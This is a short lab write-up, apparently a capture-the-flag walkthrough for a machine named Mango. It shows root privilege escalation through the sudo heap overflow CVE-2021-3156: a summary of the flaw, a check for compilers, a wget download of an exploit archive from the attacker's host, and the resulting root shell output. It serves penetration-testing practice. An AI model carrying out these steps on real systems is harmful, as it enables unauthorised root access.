InfoSec LAB

Mango_Privilege_Escalation_4

Created: 2 min read

CVE-2021-3156

PEAS has discovered that the target system is vulnerable to CVE-2021-3156

a vulnerability was found in sudo up to 1.8.31p2/1.9.5p1 (Operating System Utility Software). It has been rated as critical. This issue affects the function sudoers_policy_main. The manipulation with an unknown input leads to a heap-based overflow vulnerability. Using CWE to declare the problem leads to CWE-122. A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). Impacted is confidentiality, integrity, and availability.

exploit

Exploit found online

mango@mango:/dev/shm$ make ; gcc ; cc
 
Command 'make' not found, but can be installed with:
 
apt install make      
apt install make-guile
 
Ask your administrator to install one of them.
 
 
Command 'gcc' not found, but can be installed with:
 
apt install gcc
Please ask your administrator.
 
 
Command 'cc' not found, but can be installed with:
 
apt install gcc            
apt install clang          
apt install pentium-builder
apt install tcc            
 
Ask your administrator to install one of them.

On the contrary to the PEAS’s claim, there are no compilers within the target system Since the exploit is written in Python, I don’t need to compile it

Exploitation

mango@mango:/dev/shm$ wget -q http://10.10.16.8/CVE-2021-3156.tar.gz ; tar -xf CVE-2021-3156.tar.gz ; cd CVE-2021-3156

Delivery complete

mango@mango:/dev/shm/CVE-2021-3156$ ./exploit_nss.py 
# whoami
root
# hostname
mango
# ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.162  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:ab29  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:ab29  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:ab:29  txqueuelen 1000  (Ethernet)
        RX packets 19799097  bytes 3144521457 (3.1 GB)
        RX errors 0  dropped 89  overruns 0  frame 0
        TX packets 18693113  bytes 9751345719 (9.7 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 160309  bytes 13179497 (13.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 160309  bytes 13179497 (13.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks